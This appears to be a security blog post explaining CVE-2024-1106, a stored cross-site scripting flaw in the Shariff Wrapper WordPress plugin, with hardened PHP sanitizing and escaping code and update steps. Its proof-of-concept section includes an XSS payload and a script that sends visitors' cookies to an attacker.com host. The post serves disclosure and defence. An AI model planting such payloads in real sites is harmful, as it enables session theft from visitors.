WordPress is one of the most popular ways to build a website. While WordPress plugins make adding features easy, they can sometimes introduce security risks if not coded securely. Recently, a vulnerability named CVE-2024-1106 was found in the widely-used Shariff Wrapper plugin. If you use this plugin, pay close attention—especially if you run a multisite WordPress setup!

What is CVE-2024-1106?

CVE-2024-1106 is a security flaw in the Shariff Wrapper plugin versions before 4.6.10. This bug allows users with high privileges, such as admins (even those without the unfiltered_html capability), to inject and store malicious scripts inside the website. This is known as a Stored Cross-Site Scripting (XSS) attack.

Normally, users without the unfiltered_html permission can’t put JavaScript or other risky code into posts or sites. However, because some Shariff Wrapper settings are neither sanitized on input nor escaped on output, these restrictions can be bypassed on affected versions, even in multisite installations, where admins normally have extra limitations.

Why Is This a Big Deal?

1. Stored XSS persists: every visitor who views a page with the malicious content could be affected.
2. Multisite safe? Think again: even WordPress admins with limited code permissions can exploit this if the plugin isn’t updated!
3. Broad reach: Shariff Wrapper is widely used for privacy-friendly social media sharing buttons.

If you’re running this vulnerable version, your site and its users could be at risk.

Technical Details

At the heart of the issue is poor handling of user settings in certain plugin fields. Instead of carefully cleaning (sanitizing) the input and making it safe to display (escaping), Shariff Wrapper simply trusts what’s given. This flaw means scripts and HTML can sneak through and get saved in the database.
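
As an added illustration, not the plugin’s own code, here is the unsafe pattern described above next to the fix a plugin author would apply with WordPress core helpers. The option name, function names and settings group are assumptions.

```php
<?php
// Illustrative example (not Shariff Wrapper's code). Option name
// 'example_share_title', the settings group and all function names are assumed.

// --- Vulnerable pattern: trust the submitted value, store it, print it raw.
function example_save_title_unsafe() {
    if ( isset( $_POST['share_title'] ) ) {
        // Stored exactly as submitted: markup and scripts end up in the database.
        update_option( 'example_share_title', $_POST['share_title'] );
    }
}
function example_render_title_unsafe() {
    // Printed without escaping: whatever was stored is parsed by every visitor's browser.
    echo '<span class="share-title">' . get_option( 'example_share_title' ) . '</span>';
}

// --- Hardened pattern: sanitize on save, escape on output.
function example_sanitize_title( $value ) {
    // A share-button title never legitimately needs markup, so strip tags,
    // line breaks and stray whitespace before the value is stored.
    return sanitize_text_field( (string) $value );
}
function example_register_setting() {
    // The Settings API runs the callback on every save and handles the nonce
    // check, so a user's unfiltered_html capability no longer decides what is stored.
    register_setting( 'example_share_options', 'example_share_title', array(
        'type'              => 'string',
        'sanitize_callback' => 'example_sanitize_title',
        'default'           => '',
    ) );
}
add_action( 'admin_init', 'example_register_setting' );

function example_render_title_safe() {
    // Escape for the exact output context: esc_attr() inside an attribute,
    // esc_html() for element content. Output escaping protects visitors even if
    // an unsanitized value somehow reached the database.
    $title = get_option( 'example_share_title', '' );
    echo '<span class="share-title" title="' . esc_attr( $title ) . '">'
        . esc_html( $title ) . '</span>';
}
```

Run against the page’s sample payload, the hardened path stores a plain string with the tags removed and renders it as inert text; the unsafe path stores and replays the markup unchanged.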

Affected versions: all versions before 4.6.10

Patched in: 4.6.10 and above

Example Exploit (Proof of Concept)

Suppose a multisite environment where an admin does not have unfiltered_html (by WordPress’s built-in restriction). The settings page for Shariff Wrapper allows entering certain values for buttons or custom services.

Exploit:

Entering a malicious payload in the plugin’s settings, for example in the ‘Custom Title’ field:

<img src="x" onerror="alert('XSS by CVE-2024-1106');">

Exfiltrating cookies or session data is also possible using similar payloads:

<script>
fetch('https://attacker.com/steal?c='+document.cookie);
</script>

Once this payload is stored, all site visitors could unknowingly send their session or cookies to the attacker.

Mitigation and Update Steps

Immediate Fix:
Update Shariff Wrapper to the latest version, at least 4.6.10 or newer.

How to update:

- In the WordPress dashboard, find “Shariff Wrapper” and click “Update Now.”
- Or download the latest Shariff Wrapper and install it manually.

Important:
If you administer a multisite WordPress, update network-wide. Also, review plugin settings if you suspect tampering!

References & More Reading

- Original CVE Record: CVE-2024-1106
- Shariff Wrapper on WordPress.org
- Patch Notes for v4.6.10
- Wordfence Threat Intelligence
- OWASP XSS Guide

Conclusion

Even plugins you trust can become a risk with time. Always update your plugins, and pay special attention to multisite environments and permission settings.

If you’re on Shariff Wrapper before 4.6.10, patch this vulnerability now to keep your sites and visitors safe from XSS attacks like CVE-2024-1106.


*Stay secure, stay up-to-date! For exclusive tips and threat analysis, keep following our security reads.*

Timeline

Published on: 02/27/2024 09:15:37 UTC
Last modified on: 10/27/2024 23:35:01 UTC